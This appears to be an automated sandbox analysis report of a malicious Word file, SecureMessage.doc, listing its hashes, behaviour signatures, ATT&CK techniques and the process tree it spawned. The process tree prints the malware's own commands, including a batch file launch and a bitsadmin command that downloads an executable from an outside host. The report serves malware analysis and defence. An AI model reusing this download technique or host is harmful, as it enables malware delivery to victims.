Analysis

  • max time kernel
    107s
  • max time network
    138s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    13-10-2021 15:11

General

  • Target

    SecureMessage.doc

  • Size

    82KB

  • MD5

    b6bf42a76eb8cea70cb0a9ba2b8f31d5

  • SHA1

    fc27036fefb683e218140e1f0af78f23d711a866

  • SHA256

    3d808601a47c9ae6c1c121a5eb3297ebb8a75f3663cc425f92fc541b90c8200e

  • SHA512

    8c0d9633420537bc3c8c16114959fd9648a31f7ca1fab536a67cd0ca6acb039769f9b0a4845679f32616dcbf16e1efbe6bbed9a53be43dc35cf5a06017e847e0

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes itself 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecureMessage.doc" /o ""
    1⤵
    • Deletes itself
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2132
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c C:\Users\Admin\AppData\Roaming\peppercornensuedsolicit.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1052
      • C:\Windows\system32\PING.EXE
        ping -n 30 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1968
      • C:\Windows\system32\bitsadmin.exe
        bitsadmin /transfer backup /download /priority high https://usdata.estoreseller.com/images/logoimage.png "C:\Users\Admin\AppData\Roaming\zspriteimperturbably.exe"
        3⤵
        • Download via BitsAdmin
        PID:464

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

BITS Jobs

1
T1197

Defense Evasion

BITS Jobs

1
T1197

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Remote System Discovery

1
T1018

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\peppercornensuedsolicit.bat
    MD5

    3c5d37bcc0200c0c5358e989fee78aa6

    SHA1

    2460dcf0890ddca0aac438bcbec80aea4ba1c633

    SHA256

    4dc218c92aa2b223437b34295ceb788ab098a6331d574408b024e8503f26d93c

    SHA512

    c4d890c110140aa980756a3fdfc490805079132d0e17b35cbb6bdfda6682c8bd166de3d4c4246230ef4dc9453d616d8cff38c5b09f47f84ed44ef1a6b4eb5d30

  • memory/464-319-0x0000000000000000-mapping.dmp
  • memory/1052-281-0x0000000000000000-mapping.dmp
  • memory/1968-284-0x0000000000000000-mapping.dmp
  • memory/2132-116-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmp
    Filesize

    64KB

  • memory/2132-115-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmp
    Filesize

    64KB

  • memory/2132-117-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmp
    Filesize

    64KB

  • memory/2132-118-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmp
    Filesize

    64KB

  • memory/2132-119-0x000001B197040000-0x000001B197042000-memory.dmp
    Filesize

    8KB

  • memory/2132-120-0x000001B197040000-0x000001B197042000-memory.dmp
    Filesize

    8KB

  • memory/2132-121-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmp
    Filesize

    64KB

  • memory/2132-122-0x000001B197040000-0x000001B197042000-memory.dmp
    Filesize

    8KB